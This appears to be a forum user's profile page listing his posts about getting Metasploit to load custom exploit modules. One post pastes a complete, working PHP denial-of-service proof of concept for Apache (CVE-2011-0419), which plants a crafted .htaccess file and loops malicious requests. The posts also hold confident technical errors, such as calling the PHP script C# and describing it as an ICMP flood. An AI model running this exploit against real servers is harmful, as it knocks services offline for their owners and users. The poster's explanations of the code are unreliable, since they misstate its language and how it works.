Jump to content

TheRoyalSloan

Active Members
  • Posts

    6
  • Joined

  • Last visited

Profile Information

  • Gender
    Male

Recent Profile Visitors

218 profile views

TheRoyalSloan's Achievements

Newbie

Newbie (1/14)

  1. It is what it is, the code uses C# to inject PHP scripts to cause a DOS action, I have already listed a couple of examples on how that works. But the point of this forum is why my Metasploit-Framework Console will not recognize the module paths I have created, I am very eager to find a solution to this problem as it is causing me much distress. Any more comments about the code I posted as an example in a response to someones pointless confusion that has no relevance or any place at all here, WILL BE REPORTED. Stick to the topic and the problem at hand or do not post anything at all please.
  2. and to be more precise this script is for a denial of service attack which you can read more about at https://en.wikipedia.org/wiki/Denial-of-service_attack#Internet_Control_Message_Protocol_.28ICMP.29_flood. I say it is in C# because the author used C functions such as fclose ( https://en.wikibooks.org/wiki/C_Programming/C_Reference/stdio.h/fclose ) to inject the PHP scripts for this C application just as I vaguely said above. But what is important is why my Metasploit-Framework Console will not recognize the module paths I have created, I am very eager to find a solution as it is causing me much distress.
  3. I exceeded the number of posts I was able to submit on my original account so I had to create this new account to respond to your post. Modules can be saved as .txt, .php, .rb, and .py. You can see for yourself in the preloaded modules that come with Metasploit in the /usr/share/metasploit-framework/modules/exploits/... And this script seems to use C# send a request to PHP scripts running at the webserver and make PHP return data to C# application running on the desktop through internet.
  4. Which of course rules the theory of coding issues out. If coding issues were the problem here the msfconsole would issue the "Failed to install module." response rather than "Failed to load module" when the exploit is called upon by the user in the msfconsole for use or when the module reload command is issued by the user the "Failed to install module" would also be given as a response if the coding issues were a problem for the exploit.
  5. Absolutely, here is a .php file from an exploit I downloaded from exploit-db.com that is labled Apache 1.4-2.2.x APR 'apr_fnmatch()' Denial of Service Vulnerability: source: http://www.securityfocus.com/bid/47820/info Apache APR is prone to a vulnerability that may allow attackers to cause a denial-of-service condition. Apache APR versions prior to 1.4.4 are vulnerable. <?php /* Apache 2.2.17 mod_autoindex local/remote Denial of Service author: Maksymilian Arciemowicz CVE: CVE-2011-0419 CWE: CWE-399 REMOTE Find some directory with supported mod_autoindex on the server. The directory should contain long filenames. http://[server]/[directory_with_mod_autoindex]/?P=*?*?*?[to 4k] LOCAL Tested on: 127# httpd -v && uname -a Server version: Apache/2.2.17 (Unix) Server built: Dec 28 2010 13:21:44 NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 builds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386 Result: 127# ls -la total 8 drwxrwxrwx 2 root wheel 512 Feb 8 21:41 . drwxr-xr-x 7 www wheel 1024 Jan 31 08:49 .. -rw-r--r-- 1 www wheel 1056 Feb 8 19:39 .htaccess -rw-r--r-- 1 www wheel 0 Feb 8 19:39 cx............................................................................................................................. -rw-r--r-- 1 www wheel 1240 Feb 8 19:42 run.php 127# ps -aux -p 617 USER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND www 617 98.6 0.4 10028 4004 ? R 7:38PM 121:43.17 /usr/pkg/sbin/httpd -k start Time = 121:43 and counting where http://[$localhost]:[$localport]/[$localuri] */ $localhost="localhost"; $localport=80; $localuri="/koniec/"; if(!is_writable(".")) die("!writable"); // Phase 1 // Create some filename touch("cx".str_repeat(".",125)); // Phase 2 // Create .htaccess with unlink("./.htaccess"); $htaccess=fopen("./.htaccess", "a"); fwrite($htaccess,"AddDescription \"CVE-2011-0419\" ".str_repeat('*.',512)."\n"); fclose($htaccess); // Phase 3 // Local connect (bypass firewall restriction) while(1){ $fp = fsockopen($localhost, $localport, $errno, $errstr, 30); if (!$fp) echo "$errstr ($errno)<br />\n"; else { $out = "GET ".$localuri."/?P=".str_repeat("*?",1500)."* HTTP/1.1\r\n"; $out .= "Host: ".$localhost."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); fclose($fp); } } ?> You can tell that the exploit is written in C# by how the flow control mechanism is defined at the end by "$out .= "Connection: Close\r\n\r\n""
  6. I am completely unable to install exploits of my own or those downloaded from https://www.exploit-db.com in metasploit and went through the instructions set in this link:https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Modules and all I get after i reload the modules in metasploit is "Failed to load module:........" I have entered in all of the correct file names and locations, and i just cannot think of anything else that could cure this solution. I have even tried copying the files to the parallel spot in the metasploit-framework file, I have tried everything I can possible think of. In short, the msfconsole will not recognize the new module path that I have created through the exploits folder in the .msf4 file, no matter what I try. I have tried reloading the modules, updating the msfconsole, etc. and whenever I tell the msfconsole to show me the new module path all I receive is an Invalid Parameter response and the number of exploits remains the same as if I had never created the new module path. Am I missing any steps to install exploits into metasploit??
×
×
  • Create New...